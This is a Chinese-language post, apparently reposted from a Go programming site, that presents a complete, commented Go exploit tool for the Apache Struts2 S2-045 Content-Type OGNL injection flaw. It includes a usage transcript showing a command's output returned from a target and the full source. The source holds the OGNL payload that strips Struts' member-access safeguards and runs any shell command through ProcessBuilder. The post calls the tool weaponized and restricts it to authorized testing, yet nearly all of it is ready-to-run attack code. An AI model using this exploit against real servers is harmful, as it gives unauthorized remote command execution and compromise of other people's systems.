
Struts2 S2-045（Content-Type 头 OGNL 注入）漏洞利用工具 exp-golang

使用方法（第一个参数为目标 URL，第二个参数为要在目标上执行的命令；命令输出会随 HTTP 响应原样返回。该工具为武器化利用代码，仅可用于已获授权的测试）:

system@mac:~/golang/src/s2-045$ ./main http://xxx.com/1.jsp ifconfig
200
map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]
eth0      Link encap:Ethernet  HWaddr 52:54:E4:D1:15:00
          inet addr:192.168.1.8  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6575210434 (6.1 GiB)  TX bytes:939669875 (896.1 MiB)

源代码:

package main
import (
    "bytes"
    "flag"
    "fmt"
    "log"
    "mime/multipart"
    "net/http"
    "strings"
    "time"
)
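// newMultipartRequest builds a POST request to url whose body is a
// multipart/form-data document containing one text field per entry of params.
//
// The body itself is only a decoy that makes the request look like a normal
// form upload: no Content-Type header is set here on purpose, because the
// caller (main) overwrites Content-Type with the OGNL payload that carries
// the actual exploit. Any error from writing a field or finishing the
// multipart document is returned rather than discarded, so a malformed body
// is never sent silently.
func newMultipartRequest(url string, params map[string]string) (*http.Request, error) {
    body := &bytes.Buffer{}
    writer := multipart.NewWriter(body)
    for key, val := range params {
        if err := writer.WriteField(key, val); err != nil {
            return nil, err
        }
    }
    // Close writes the terminating boundary; without it the body is truncated.
    if err := writer.Close(); err != nil {
        return nil, err
    }
    return http.NewRequest("POST", url, body)
}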
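// main sends one S2-045 request to the target URL given as the first
// argument and prints the response (status, headers, body) to stdout. The
// second argument is the command to run; the OGNL payload copies its output
// into the HTTP response, so it appears in the printed body.
//
// Usage: main <url> <command>. Any error terminates the program via log.Fatal.
//
// This is a weaponized exploit: use it only against systems you are
// authorized to test.
func main() {
    flag.Parse()
    if flag.NArg() < 2 {
        log.Fatal("usage: main <url> <command>")
    }
    url := flag.Arg(0)
    cmd := flag.Arg(1)

    // The command is spliced into a single-quoted OGNL string literal. Escape
    // backslashes and single quotes so a command containing either cannot end
    // the literal early and break (or change the meaning of) the expression.
    cmdLit := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(cmd)

    // What the payload does, in order:
    //  1. Names multipart/form-data so the Content-Type still looks like a
    //     multipart upload while starting with "%{", the OGNL expression marker.
    //  2. Tries to replace the current member-access guard with
    //     DEFAULT_MEMBER_ACCESS; if that is not possible, it fetches OgnlUtil
    //     from the action container, clears its excluded package and class
    //     lists, and installs the permissive guard via setMemberAccess.
    //  3. Picks "cmd.exe /c" or "/bin/bash -c" from the JVM's os.name.
    //  4. Starts the command with ProcessBuilder (stderr merged into stdout)
    //     and streams its output into the servlet response via IOUtils.copy.
    payload := "%{(#nike='multipart/form-data')." +
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." +
        "(#_memberAccess?(#_memberAccess=#dm):(" +
        "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +
        "(#ognlUtil.getExcludedPackageNames().clear())." +
        "(#ognlUtil.getExcludedClasses().clear())." +
        "(#context.setMemberAccess(#dm))))." +
        "(#cmd='" + cmdLit + "')." +
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." +
        "(#p=new java.lang.ProcessBuilder(#cmds))." +
        "(#p.redirectErrorStream(true))." +
        "(#process=#p.start())." +
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." +
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +
        "(#ros.flush())}"

    // The multipart body only makes the request look like a form upload; the
    // exploit lives entirely in the Content-Type header set below.
    extraParams := map[string]string{
        "Test": "",
    }
    request, err := newMultipartRequest(url, extraParams)
    if err != nil {
        log.Fatal(err)
    }
    request.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
    // Replace the real multipart Content-Type with the OGNL expression.
    request.Header.Set("Content-Type", payload)

    // Bound the whole exchange so a target that accepts the connection but
    // never answers (or a long-running command) cannot hang the tool forever.
    client := &http.Client{Timeout: 30 * time.Second}
    resp, err := client.Do(request)
    if err != nil {
        log.Fatal(err)
    }
    defer resp.Body.Close()

    // Read the full response body; the command output is embedded in it.
    body := &bytes.Buffer{}
    if _, err := body.ReadFrom(resp.Body); err != nil {
        log.Fatal(err)
    }
    fmt.Println(resp.StatusCode)
    fmt.Println(resp.Header)
    fmt.Println(body)
}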
原文  https://studygolang.com/articles/24749